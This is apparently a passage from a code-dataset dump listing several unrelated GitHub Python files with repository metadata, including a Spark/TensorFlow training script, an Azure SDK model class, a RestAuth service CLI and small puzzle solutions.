] | permissive | shmakovpn/whatprovides | b7a3867f0529d465a8405f6669b797a5c7de2e2c | 69aab055397ae49844c93cfe17fdfaf18b02f79d | refs/heads/master | 2023-02-12T00:39:28.936096 | 2021-01-14T08:26:25 | 2021-01-14T08:26:25 | 273,847,446 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 555 | py | """
whatprovides makedoc.py
This script runs 'shpinx-build -b html docs/source docs/build/html'
"""
import os
SCRIPT_DIR: str = os.path.dirname(os.path.abspath(__file__))
def run_sphinx():
docs_dir: str = os.path.join(SCRIPT_DIR, 'docs')
docs_source_dir: str = os.path.join(docs_dir, 'source')
build_dir: str = os.path.join(docs_dir, 'build')
html_dir: str = os.path.join(build_dir, 'html')
os.system('sphinx-build -b html "%s" "%s"' % (docs_source_dir, html_dir))
print('__END__')
if __name__ == '__main__':
run_sphinx()
| [
"shmakovpn@yandex.ru"
] | shmakovpn@yandex.ru |
e1b9563a9df155f936dd790955394eb6f63dea35 | 7f73a273b5c55ccbb506c4b7069132555389d11c | /.idea/spark-warehouse/spark-streaming/bank_2017_11_25/ekf_model.py | 0c89de7afc02fbee1fb24eff394646ec4195d168 | [] | no_license | lfforai/zd_project | a8d5e278aeaa2709f798a1cdc16457762d2498d0 | 751c66c395520989a36a6ec272f7e9ce5c2d8c08 | refs/heads/master | 2021-09-09T12:55:16.917968 | 2018-03-16T09:44:51 | 2018-03-16T09:44:51 | 108,788,113 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,001 | py | #///////////////////////////////////////////////////////////////////////////////////////
#./spark-submit --conf spark.executorEnv.LD_LIBRARY_PATH="${JAVA_HOME}/jre/lib/amd64/server:/usr/local/cuda-8.0/lib64" --conf spark.executorEnv.CLASSPATH="$($HADOOP_HOME/bin/hadoop classpath --glob):${CLASSPATH}" --conf spark.executorEnv.HADOOP_HDFS_HOME="/tool_lf/hadoop/hadoop-2.7.4" ~/IdeaProjects/pyspark_t/.idea/spark-warehouse/spark-streaming/exp.py
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import random
#
from pyspark.context import SparkContext
from pyspark.conf import SparkConf
from hdfs import *
client_N = Client("http://127.0.0.1:50070")
import argparse
import os
import numpy
import sys
import tensorflow as tf
import threading
import time
import ekf_model_mapfunc
from datetime import datetime
from tensorflowonspark import TFCluster
from tensorflow.contrib.timeseries.python.timeseries import NumpyReader
# import pyspark.sql as sql_n #spark.sql
# from pyspark import SparkContext # pyspark.SparkContext dd
# from pyspark.conf import SparkConf #conf
os.environ['JAVA_HOME'] = "/tool_lf/java/jdk1.8.0_144/bin/java"
os.environ["PYSPARK_PYTHON"] = "/root/anaconda3/bin/python"
os.environ["HADOOP_USER_NAME"] = "root"
os.environ["CUDA_VISIBLE_DEVICES"] = "0,1"
os.environ["spark.executorEnv.LD_LIBRARY_PATH"]="${JAVA_HOME}/jre/lib/amd64/server:/usr/local/cuda-8.0/lib64"
os.environ["spark.executorEnv.CLASSPATH"]="$($HADOOP_HOME/bin/hadoop classpath --glob):${CLASSPATH}"
os.environ["spark.executorEnv.HADOOP_HDFS_HOME"]="/tool_lf/hadoop/hadoop-2.7.4"
conf=SparkConf().setMaster("spark://titianx:7077")
sc=SparkContext(conf=conf)
# spark = sql_n.SparkSession.builder.appName("lf").config(conf=conf).getOrCreate()
# sc =spark.sparkContext
# sqlContext=sql_n.SQLContext(sparkContext=sc,sparkSession=spark)
executors = sc._conf.get("spark.executor.instances")
print("executors:=",executors)
num_executors = int(executors) if executors is not None else 4
num_ps = 0
parser = argparse.ArgumentParser()
parser.add_argument("-b", "--batch_size", help="number of records per batch", type=int, default=10000)
parser.add_argument("-e", "--epochs", help="number of epochs", type=int, default=1)
# parser.add_argument("-f", "--format", help="example format: (csv|pickle|tfr)", choices=["csv","pickle","tfr"], default="csv")
# parser.add_argument("-i", "--images", help="HDFS path to MNIST images in parallelized format")
# parser.add_argument("-l", "--labels", help="HDFS path to MNIST labels in parallelized format")
parser.add_argument("-m", "--model", help="HDFS path to save/load model during train/inference", default="ekf_model")
parser.add_argument("-n", "--cluster_size", help="number of nodes in the cluster", type=int, default=num_executors)
parser.add_argument("-o", "--output", help="HDFS path to save test/inference output", default="predictions")
parser.add_argument("-r", "--readers", help="number of reader/enqueue threads", type=int, default=4)
parser.add_argument("-s", "--steps", help="maximum number of steps", type=int, default=2)
parser.add_argument("-tb", "--tensorboard", help="launch tensorboard process", action="store_true")
parser.add_argument("-X", "--mode", help="train|inference", default="train")
parser.add_argument("-c", "--rdma", help="use rdma connection", default=False)
args = parser.parse_args()
#删除存储模型参数用目录
if client_N.list("/user/root/").__contains__("model") and args.mode=='train':
client_N.delete("/user/root/model/",recursive=True)
print("args:",args)
print("{0} ===== Start".format(datetime.now().isoformat()))
def sample_map(fraction_base,rato):
def _sample_map(iter):
while True:
fraction_use=random.random()
if fraction_use-rato<0.10 and fraction_use-rato>-0.10:
break
input_length=int(fraction_base*fraction_use)
rezult=[]
num=0
# start=random.random()*1000
for i in iter:
if num<input_length and 240<num:
rezult.append(i)
else:
if num>input_length:
break
num=num+1
return rezult
return _sample_map
# dataRDD1_count=sc.textFile("hdfs://127.0.0.1:9000/zd_data2/FS/G_CFYH_2_034FS001.txt") \
# .map(lambda x:str(x).split(",")).map(lambda x:(1,float(x[1]))).count()
# dataRDD2_count=sc.textFile("hdfs://127.0.0.1:9000/zd_data2/FS/G_CFYH_2_035FS001.txt") \
# .map(lambda x:str(x).split(",")).map(lambda x:(2,float(x[1]))).count()
# dataRDD3_count=sc.textFile("hdfs://127.0.0.1:9000/zd_data2/FS/G_CFYH_2_039FS001.txt") \
# .map(lambda x:str(x).split(",")).map(lambda x:(3,float(x[1]))).count()
# dataRDD4_count=sc.textFile("hdfs://127.0.0.1:9000/zd_data2/FS/G_CFYH_2_041FS001.txt") \
# .map(lambda x:str(x).split(",")).map(lambda x:(4,float(x[1]))).count()
# dataRDD5_count=sc.textFile("hdfs://127.0.0.1:9000/zd_data2/FS/G_CFYH_2_034FS001.txt") \
# .map(lambda x:str(x).split(",")).map(lambda x:(5,float(x[1]))).count()
# dataRDD6_count=sc.textFile("hdfs://127.0.0.1:9000/zd_data2/FS/G_CFYH_2_035FS001.txt") \
# .map(lambda x:str(x).split(",")).map(lambda x:(6,float(x[1]))).count()
# dataRDD7_count=sc.textFile("hdfs://127.0.0.1:9000/zd_data2/FS/G_CFYH_2_039FS001.txt") \
# .map(lambda x:str(x).split(",")).map(lambda x:(7,float(x[1]))).count()
# dataRDD8_count=sc.textFile("hdfs://127.0.0.1:9000/zd_data2/FS/G_CFYH_2_041FS001.txt") \
# .map(lambda x:str(x).split(",")).map(lambda x:(8,float(x[1]))).count()
fraction_base,rato=5000,0.75
dataRDD1=sc.textFile("hdfs://127.0.0.1:9000/zd_data2/FS/G_CFYH_2_034FS001.txt")\
.map(lambda x:str(x).split(",")).map(lambda x:("34FS",float(x[1]))).mapPartitions(sample_map(fraction_base,rato)).repartition(1)
dataRDD2=sc.textFile("hdfs://127.0.0.1:9000/zd_data2/FS/G_CFYH_2_035FS001.txt") \
.map(lambda x:str(x).split(",")).map(lambda x:("35FS",float(x[1]))).mapPartitions(sample_map(fraction_base,rato)).repartition(1)
dataRDD3=sc.textFile("hdfs://127.0.0.1:9000/zd_data2/FS/G_CFYH_2_039FS001.txt") \
.map(lambda x:str(x).split(",")).map(lambda x:("39FS",float(x[1]))).mapPartitions(sample_map(fraction_base,rato)).repartition(1)
dataRDD4=sc.textFile("hdfs://127.0.0.1:9000/zd_data2/FS/G_CFYH_2_041FS001.txt") \
.map(lambda x:str(x).split(",")).map(lambda x:("41FS",float(x[1]))).mapPartitions(sample_map(fraction_base,rato)).repartition(1)
# dataRDD5=sc.textFile("hdfs://127.0.0.1:9000/zd_data2/FS/G_CFYH_2_034FS001.txt") \
# .map(lambda x:str(x).split(",")).map(lambda x:(5,float(x[1]))).mapPartitions(sample_map(fraction_base,rato)).repartition(1)
# dataRDD6=sc.textFile("hdfs://127.0.0.1:9000/zd_data2/FS/G_CFYH_2_035FS001.txt") \
# .map(lambda x:str(x).split(",")).map(lambda x:(6,float(x[1]))).mapPartitions(sample_map(fraction_base,rato)).repartition(1)
# dataRDD7=sc.textFile("hdfs://127.0.0.1:9000/zd_data2/FS/G_CFYH_2_039FS001.txt") \
# .map(lambda x:str(x).split(",")).map(lambda x:(7,float(x[1]))).mapPartitions(sample_map(fraction_base,rato)).repartition(1)
# dataRDD8=sc.textFile("hdfs://127.0.0.1:9000/zd_data2/FS/G_CFYH_2_041FS001.txt") \
# .map(lambda x:str(x).split(",")).map(lambda x:(8,float(x[1]))).mapPartitions(sample_map(fraction_base,rato)).repartition(1)
a=[dataRDD1,dataRDD2,dataRDD3,dataRDD4]
#,dataRDD5,dataRDD6,dataRDD7,dataRDD8]
dataRDD=sc.union(a)
print(dataRDD.take(100))
rdd_count=dataRDD.count()
print("count:====================",rdd_count)
print("partition:=",dataRDD.getNumPartitions())
# def func(x,iter):
# result = []
# for value in iter:
# result.append((x,value))
# return result
# dataRDD=sc.parallelize(range(150003),3).mapPartitionsWithIndex(func)
# print(dataRDD.take(100))
if rdd_count<1000:
args.epochs=2
args.batch_size=1000
else:
args.epochs=1
args.batch_size=1000
# print("getNumPartitions:=",dataRDD.getNumPartitions())
cluster = TFCluster.run(sc, ekf_model_mapfunc.map_fun, args, args.cluster_size, num_ps, args.tensorboard, TFCluster.InputMode.SPARK)
# if args.mode == "train":
cluster.train(dataRDD, args.epochs)
cluster.shutdown()
print("-----------------train over-------------------------------")
# # else:
def func1(iter):
result = []
num=0
for value in iter:
result.append(value)
num=num+1
if num>2400:
break
return result
dataRDD1=sc.union(a).mapPartitions(func1)
# dataRDD1=sc.parallelize(range(600),3).mapPartitionsWithIndex(func)
# print("getNumPartitions:=",dataRDD1.getNumPartitions())
args.mode='inference'
args.batch_size=300
args.epochs=1
args.steps=1
print(args.mode)
cluster1 = TFCluster.run(sc, ekf_model_mapfunc.map_fun, args, args.cluster_size, num_ps, args.tensorboard, TFCluster.InputMode.SPARK)
labelRDD = cluster1.inference(dataRDD1)
print(labelRDD.filter(lambda x:not str(x[0]).__eq__('o')).collect())# .saveAsTextFile(args.output)
cluster1.shutdown()
print("-----------------inference over-------------------------------")
print("{0} ===== Stop".format(datetime.now().isoformat())) | [
"18073072@qq.com"
] | 18073072@qq.com |
1f0527954e2232a1b08f61294ae822a4c8c0d7b8 | ae43c148e114d66a11fe79cf39dba5aa8541adc1 | /stubs.v4/s3IPekUedU5U8YgCOUPVRVr52psgnm_uIGZdlwqu2-A=/python._stat.pyi | e646547adc91d472e0c8e976bf8925f9232137f5 | [] | no_license | css20090922/linebot | c5561ae498dd82efcdd42fedd09f542d6b3f2bae | 389e91e972ed115f64352f56537e0efa6dd8d690 | refs/heads/master | 2023-06-27T01:02:06.174093 | 2021-03-04T03:34:45 | 2021-03-04T03:34:45 | 244,527,793 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,289 | pyi | FILE_ATTRIBUTE_ARCHIVE = 32
FILE_ATTRIBUTE_COMPRESSED = 2048
FILE_ATTRIBUTE_DEVICE = 64
FILE_ATTRIBUTE_DIRECTORY = 16
FILE_ATTRIBUTE_ENCRYPTED = 16384
FILE_ATTRIBUTE_HIDDEN = 2
FILE_ATTRIBUTE_INTEGRITY_STREAM = 32768
FILE_ATTRIBUTE_NORMAL = 128
FILE_ATTRIBUTE_NOT_CONTENT_INDEXED = 8192
FILE_ATTRIBUTE_NO_SCRUB_DATA = 131072
FILE_ATTRIBUTE_OFFLINE = 4096
FILE_ATTRIBUTE_READONLY = 1
FILE_ATTRIBUTE_REPARSE_POINT = 1024
FILE_ATTRIBUTE_SPARSE_FILE = 512
FILE_ATTRIBUTE_SYSTEM = 4
FILE_ATTRIBUTE_TEMPORARY = 256
FILE_ATTRIBUTE_VIRTUAL = 65536
SF_APPEND = 262144
SF_ARCHIVED = 65536
SF_IMMUTABLE = 131072
SF_NOUNLINK = 1048576
SF_SNAPSHOT = 2097152
ST_ATIME = 7
ST_CTIME = 9
ST_DEV = 2
ST_GID = 5
ST_INO = 1
ST_MODE = 0
ST_MTIME = 8
ST_NLINK = 3
ST_SIZE = 6
ST_UID = 4
S_ENFMT = 1024
S_IEXEC = 64
S_IFBLK = 24576
S_IFCHR = 8192
S_IFDIR = 16384
S_IFDOOR = 0
S_IFIFO = 4096
S_IFLNK = 40960
def S_IFMT():
"Return the portion of the file's mode that describes the file type."
pass
S_IFPORT = 0
S_IFREG = 32768
S_IFSOCK = 49152
S_IFWHT = 0
def S_IMODE():
"Return the portion of the file's mode that can be set by os.chmod()."
pass
S_IREAD = 256
S_IRGRP = 32
S_IROTH = 4
S_IRUSR = 256
S_IRWXG = 56
S_IRWXO = 7
S_IRWXU = 448
def S_ISBLK(mode):
'S_ISBLK(mode) -> bool\n\nReturn True if mode is from a block special device file.'
return True
def S_ISCHR(mode):
'S_ISCHR(mode) -> bool\n\nReturn True if mode is from a character special device file.'
return True
def S_ISDIR(mode):
'S_ISDIR(mode) -> bool\n\nReturn True if mode is from a directory.'
return True
def S_ISDOOR(mode):
'S_ISDOOR(mode) -> bool\n\nReturn True if mode is from a door.'
return True
def S_ISFIFO(mode):
'S_ISFIFO(mode) -> bool\n\nReturn True if mode is from a FIFO (named pipe).'
return True
S_ISGID = 1024
def S_ISLNK(mode):
'S_ISLNK(mode) -> bool\n\nReturn True if mode is from a symbolic link.'
return True
def S_ISPORT(mode):
'S_ISPORT(mode) -> bool\n\nReturn True if mode is from an event port.'
return True
def S_ISREG(mode):
'S_ISREG(mode) -> bool\n\nReturn True if mode is from a regular file.'
return True
def S_ISSOCK(mode):
'S_ISSOCK(mode) -> bool\n\nReturn True if mode is from a socket.'
return True
S_ISUID = 2048
S_ISVTX = 512
def S_ISWHT(mode):
'S_ISWHT(mode) -> bool\n\nReturn True if mode is from a whiteout.'
return True
S_IWGRP = 16
S_IWOTH = 2
S_IWRITE = 128
S_IWUSR = 128
S_IXGRP = 8
S_IXOTH = 1
S_IXUSR = 64
UF_APPEND = 4
UF_COMPRESSED = 32
UF_HIDDEN = 32768
UF_IMMUTABLE = 2
UF_NODUMP = 1
UF_NOUNLINK = 16
UF_OPAQUE = 8
__doc__ = 'S_IFMT_: file type bits\nS_IFDIR: directory\nS_IFCHR: character device\nS_IFBLK: block device\nS_IFREG: regular file\nS_IFIFO: fifo (named pipe)\nS_IFLNK: symbolic link\nS_IFSOCK: socket file\nS_IFDOOR: door\nS_IFPORT: event port\nS_IFWHT: whiteout\n\nS_ISUID: set UID bit\nS_ISGID: set GID bit\nS_ENFMT: file locking enforcement\nS_ISVTX: sticky bit\nS_IREAD: Unix V7 synonym for S_IRUSR\nS_IWRITE: Unix V7 synonym for S_IWUSR\nS_IEXEC: Unix V7 synonym for S_IXUSR\nS_IRWXU: mask for owner permissions\nS_IRUSR: read by owner\nS_IWUSR: write by owner\nS_IXUSR: execute by owner\nS_IRWXG: mask for group permissions\nS_IRGRP: read by group\nS_IWGRP: write by group\nS_IXGRP: execute by group\nS_IRWXO: mask for others (not in group) permissions\nS_IROTH: read by others\nS_IWOTH: write by others\nS_IXOTH: execute by others\n\nUF_NODUMP: do not dump file\nUF_IMMUTABLE: file may not be changed\nUF_APPEND: file may only be appended to\nUF_OPAQUE: directory is opaque when viewed through a union stack\nUF_NOUNLINK: file may not be renamed or deleted\nUF_COMPRESSED: OS X: file is hfs-compressed\nUF_HIDDEN: OS X: file should not be displayed\nSF_ARCHIVED: file may be archived\nSF_IMMUTABLE: file may not be changed\nSF_APPEND: file may only be appended to\nSF_NOUNLINK: file may not be renamed or deleted\nSF_SNAPSHOT: file is a snapshot file\n\nST_MODE\nST_INO\nST_DEV\nST_NLINK\nST_UID\nST_GID\nST_SIZE\nST_ATIME\nST_MTIME\nST_CTIME\n\nFILE_ATTRIBUTE_*: Windows file attribute constants\n (only present on Windows)\n'
__name__ = '_stat'
__package__ = ''
def filemode():
"Convert a file's mode to a string of the form '-rwxrwxrwx'"
pass
| [
"edward19990329@gmail.com"
] | edward19990329@gmail.com |
4cf780028fed950bf6c53ed63ac5f5459dfcb2bd | 1fccf52e0a694ec03aac55e42795487a69ef1bd4 | /src/euler_python_package/euler_python/medium/p167.py | 07df025620b7d9aa7d16a09fa14634cac511e29d | [
"MIT"
] | permissive | wilsonify/euler | 3b7e742b520ee3980e54e523a018cd77f7246123 | 5214b776175e6d76a7c6d8915d0e062d189d9b79 | refs/heads/master | 2020-05-27T12:15:50.417469 | 2019-09-14T22:42:35 | 2019-09-14T22:42:35 | 188,614,451 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 27 | py | def problem167():
pass
| [
"tom.andrew.wilson@gmail.com"
] | tom.andrew.wilson@gmail.com |
18d7e89c4ff3ab5e1f4886895111d3e359f7a99a | 0466559817d3a1be9409da2c83db99c4db3bacfe | /hubcheck/pageobjects/widgets/tools_status_approve_license_form.py | 7c7e4da3883a72ce8d045d1ce61dc77718770acd | [
"MIT"
] | permissive | ken2190/hubcheck | 955cf9b75a1ee77e28256dfd3a780cfbc17de961 | 2ff506eb56ba00f035300862f8848e4168452a17 | refs/heads/master | 2023-03-20T15:17:12.949715 | 2015-09-29T16:11:18 | 2015-09-29T16:11:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,813 | py | from hubcheck.pageobjects.widgets.form_base import FormBase
from hubcheck.pageobjects.basepageelement import Button
from hubcheck.pageobjects.basepageelement import Checkbox
from hubcheck.pageobjects.basepageelement import Select
from hubcheck.pageobjects.basepageelement import TextArea
class ToolsStatusApproveLicenseForm(FormBase):
def __init__(self, owner, locatordict={}):
super(ToolsStatusApproveLicenseForm,self).__init__(owner,locatordict)
# load hub's classes
ToolsStatusApproveLicenseForm_Locators = \
self.load_class('ToolsStatusApproveLicenseForm_Locators')
# update this object's locator
self.locators.update(ToolsStatusApproveLicenseForm_Locators.locators)
# update the locators with those from the owner
self.update_locators_from_owner()
# setup page object's components
self.sourceaccess = Select(self,{'base':'access'})
self.templates = Select(self,{'base':'templates'})
self.licensetext = TextArea(self,{'base':'license'})
self.reason = TextArea(self,{'base':'reason'})
self.authorize = Checkbox(self,{'base':'authorize'})
self.fields = ['sourceaccess','templates','licensetext','reason','authorize']
# update the component's locators with this objects overrides
self._updateLocators()
class ToolsStatusApproveLicenseForm_Locators_Base(object):
"""locators for ToolsStatusApproveLicenseForm object"""
locators = {
'base' : "css=#licenseForm",
'access' : "css=#t_code",
'templates' : "css=#templates",
'license' : "css=#license",
'reason' : "css=#reason",
'authorize' : "css=#field-authorize",
'submit' : "css=#licenseForm [type='submit']",
}
| [
"telldsk@gmail.com"
] | telldsk@gmail.com |
5bd122562edd702b509be8347cb903fabd7a348c | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02622/s965763591.py | 6eb619ddc1792d0336e698e3556c81de57f06d66 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 153 | py | s = input()
t = input()
ans = abs(len(s) - len(t))
count = min(len(s), len(t))
for i in range(count):
if s[i] != t [i]:
ans += 1
print(ans) | [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
450964e2ca1c9a822fb9063c290bf73249f962dc | b72dbc51279d3e59cb6410367b671f8a956314c1 | /leet_code/leet_289_미완.py | af573016d838cdf5fed6d1582fe7f3571eef673e | [] | no_license | ddobokki/coding-test-practice | 7b16d20403bb1714d97adfd1f47aa7d3ccd7ea4b | c88d981a1d43b986169f7884ff3ef1498e768fc8 | refs/heads/main | 2023-07-08T15:09:32.269059 | 2021-08-08T12:19:44 | 2021-08-08T12:19:44 | 344,116,013 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 934 | py | class Solution:
def wordPattern(self, pattern: str, s: str) -> bool:
p_to_s = {}
s_to_p = {}
s_list = s.split()
if len(pattern) != len(s_list):
return False
for i in range(len(pattern)):
if not pattern[i] in p_to_s:
p_to_s[pattern[i]] = s_list[i]
else:
if p_to_s[pattern[i]] != s_list[i]:
return False
if not s_list[i] in s_to_p:
s_to_p[s_list[i]] = pattern[i]
else:
if s_to_p[s_list[i]] != pattern[i]:
return False
return True
print(Solution().wordPattern(pattern = "abba", s = "dog cat cat dog"))
print(Solution().wordPattern(pattern = "aaaa", s = "dog cat cat dog"))
print(Solution().wordPattern(pattern = "abba", s = "dog cat cat fish"))
print(Solution().wordPattern(pattern = "abba", s = "dog dog dog dog")) | [
"44228269+ddobokki@users.noreply.github.com"
] | 44228269+ddobokki@users.noreply.github.com |
43dc21afee9084e1dac7059070a15dba3c140d9b | 8c5c4102b1c0f54ceeaa67188532f72c7e269bab | /ucr_adiac.py | 9d23e9782528db8910955949b3d7e0c9ed82de5a | [
"MIT"
] | permissive | stjordanis/dtw-numba | a6d3e745e005b0bc8026d973f33668931bbde9f2 | d8bc9e1f0cde108e429ff72e654ed8aa10a6b4ae | refs/heads/master | 2022-01-04T16:59:26.423994 | 2019-01-14T01:45:11 | 2019-01-14T01:45:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 457 | py | from utils.data_loader import load_dataset
from odtw import KnnDTW
X_train, y_train, X_test, y_test = load_dataset('adiac', normalize_timeseries=True)
print()
# parameters
num_neighbours = 1
model = KnnDTW(num_neighbours)
# fit to the dataset
model.fit(X_train, y_train)
# Predict / Evaluate the score
accuracy = model.evaluate(X_test, y_test)
error = 1. - accuracy
print("*" * 20, "\n")
print("Test Accuracy :", accuracy)
print("Test Error :", error) | [
"titu1994@gmail.com"
] | titu1994@gmail.com |
a3fad2f7d00ea5094ccd316d80677c52d5b80656 | 61efd764ae4586b6b2ee5e6e2c255079e2b01cfc | /azure-mgmt-network/azure/mgmt/network/v2017_10_01/models/application_gateway_frontend_ip_configuration.py | 955d0ad0ccdd29a9286612911582c511c7937114 | [
"MIT"
] | permissive | AutorestCI/azure-sdk-for-python | a3642f53b5bf79d1dbb77851ec56f4cc0c5b3b61 | 60b0726619ce9d7baca41f6cd38f741d74c4e54a | refs/heads/master | 2021-01-21T02:23:59.207091 | 2018-01-31T21:31:27 | 2018-01-31T21:31:27 | 55,251,306 | 4 | 3 | null | 2017-11-13T17:57:46 | 2016-04-01T17:48:48 | Python | UTF-8 | Python | false | false | 3,079 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .sub_resource import SubResource
class ApplicationGatewayFrontendIPConfiguration(SubResource):
"""Frontend IP configuration of an application gateway.
:param id: Resource ID.
:type id: str
:param private_ip_address: PrivateIPAddress of the network interface IP
Configuration.
:type private_ip_address: str
:param private_ip_allocation_method: PrivateIP allocation method. Possible
values include: 'Static', 'Dynamic'
:type private_ip_allocation_method: str or
~azure.mgmt.network.v2017_10_01.models.IPAllocationMethod
:param subnet: Reference of the subnet resource.
:type subnet: ~azure.mgmt.network.v2017_10_01.models.SubResource
:param public_ip_address: Reference of the PublicIP resource.
:type public_ip_address:
~azure.mgmt.network.v2017_10_01.models.SubResource
:param provisioning_state: Provisioning state of the public IP resource.
Possible values are: 'Updating', 'Deleting', and 'Failed'.
:type provisioning_state: str
:param name: Name of the resource that is unique within a resource group.
This name can be used to access the resource.
:type name: str
:param etag: A unique read-only string that changes whenever the resource
is updated.
:type etag: str
:param type: Type of the resource.
:type type: str
"""
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'private_ip_address': {'key': 'properties.privateIPAddress', 'type': 'str'},
'private_ip_allocation_method': {'key': 'properties.privateIPAllocationMethod', 'type': 'str'},
'subnet': {'key': 'properties.subnet', 'type': 'SubResource'},
'public_ip_address': {'key': 'properties.publicIPAddress', 'type': 'SubResource'},
'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'etag': {'key': 'etag', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
}
def __init__(self, id=None, private_ip_address=None, private_ip_allocation_method=None, subnet=None, public_ip_address=None, provisioning_state=None, name=None, etag=None, type=None):
super(ApplicationGatewayFrontendIPConfiguration, self).__init__(id=id)
self.private_ip_address = private_ip_address
self.private_ip_allocation_method = private_ip_allocation_method
self.subnet = subnet
self.public_ip_address = public_ip_address
self.provisioning_state = provisioning_state
self.name = name
self.etag = etag
self.type = type
| [
"laurent.mazuel@gmail.com"
] | laurent.mazuel@gmail.com |
3cf9d17ecba3aa57d48ecb8dfdd99b8f2850da18 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03407/s848933325.py | ff4cec19ca5069927aff3e41f680aa80c10562e8 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 158 | py | def solve(string):
a, b, c = map(int, string.split())
return "Yes" if a + b - c >= 0 else "No"
if __name__ == '__main__':
print(solve(input()))
| [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
02b153c3d0fc5f6666834084cdbd1206b6fec8e0 | 5ff73a257eed74de87c0279c69552c19420fcc7d | /venv/bin/restauth-service.py | 1c22855c0d3bbf3289c293172bb8dd3aa5f859d9 | [] | no_license | GanapathiAmbore/api_auth_pro | 9109f4fbd50ae0225875daa3f82418b7c9aa5381 | d98e3cf1cade4c9b461fe298f94bdc38625c06aa | refs/heads/master | 2022-06-13T08:31:49.728775 | 2019-07-16T05:16:37 | 2019-07-16T05:16:37 | 196,578,277 | 0 | 0 | null | 2022-04-22T21:55:26 | 2019-07-12T12:47:44 | Python | UTF-8 | Python | false | false | 3,830 | py | #!/home/ganapathi/PycharmProjects/authpro/venv/bin/python
# -*- coding: utf-8 -*-
#
# This file is part of RestAuth (https://restauth.net).
#
# RestAuth is free software: you can redistribute it and/or modify it under the terms of the GNU
# General Public License as published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# RestAuth is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
# even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License along with RestAuth. If not,
# see <http://www.gnu.org/licenses/>.
from __future__ import unicode_literals
import os
import sys
from pkg_resources import DistributionNotFound
from pkg_resources import Requirement
from pkg_resources import resource_filename
# Setup environment
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'RestAuth.settings')
sys.path.append(os.getcwd())
try:
req = Requirement.parse("RestAuth")
path = resource_filename(req, 'RestAuth')
if os.path.exists(path): # pragma: no cover
sys.path.insert(0, path)
except DistributionNotFound:
pass # we're run in a not-installed environment
try:
from django.core.exceptions import ValidationError
from django.db import transaction
from django.db.utils import IntegrityError
from Services.models import Service
from Services.cli.parsers import parser
except ImportError as e: # pragma: no cover
sys.stderr.write(
'Error: Cannot import RestAuth. Please make sure RestAuth is in your PYTHONPATH.\n')
sys.exit(1)
def main(args=None):
args = parser.parse_args(args=args)
if args.action == 'add':
password = args.get_password(args)
if args.password_generated:
print(args.pwd)
args.service.set_password(password)
args.service.save()
elif args.action == 'rename':
args.service.username = args.name
with transaction.atomic():
try:
args.service.save()
except IntegrityError:
parser.error("%s: Service already exists." % args.name)
elif args.action == 'rm':
args.service.delete()
elif args.action == 'ls':
for service in Service.objects.all().order_by('username'):
print('%s: %s' % (service.name, ', '.join(service.addresses)))
elif args.action == 'view':
print('Last used: %s' % (args.service.last_login))
print('Hosts: %s' % (', '.join(args.service.addresses)))
print('Permissions: %s' % (', '.join(args.service.permissions)))
elif args.action == 'set-hosts':
try:
args.service.set_hosts(*args.hosts)
except ValidationError as e:
parser.error(e.messages[0])
elif args.action == 'add-hosts':
try:
args.service.add_hosts(*args.hosts)
except ValidationError as e:
parser.error(e.messages[0])
elif args.action == 'rm-hosts':
args.service.del_hosts(*args.hosts)
elif args.action == 'set-password':
password = args.get_password(args)
if args.password_generated:
print(args.pwd)
args.service.set_password(password)
args.service.save()
elif args.action == 'set-permissions':
args.service.user_permissions.clear()
args.service.user_permissions.add(*args.permissions)
elif args.action == 'add-permissions':
args.service.user_permissions.add(*args.permissions)
elif args.action == 'rm-permissions': # pragma: no branch
args.service.user_permissions.remove(*args.permissions)
if __name__ == '__main__': # pragma: no cover
main()
| [
"ganapathiambore@gmail.com"
] | ganapathiambore@gmail.com |
01afe9e24bd9eb31dadd305dec3fa3f60ba98f28 | 1d23c51bd24fc168df14fa10b30180bd928d1ea4 | /Lib/site-packages/twisted/logger/_legacy.py | c03f93b687532317a997175c0116dd9231be8e8f | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
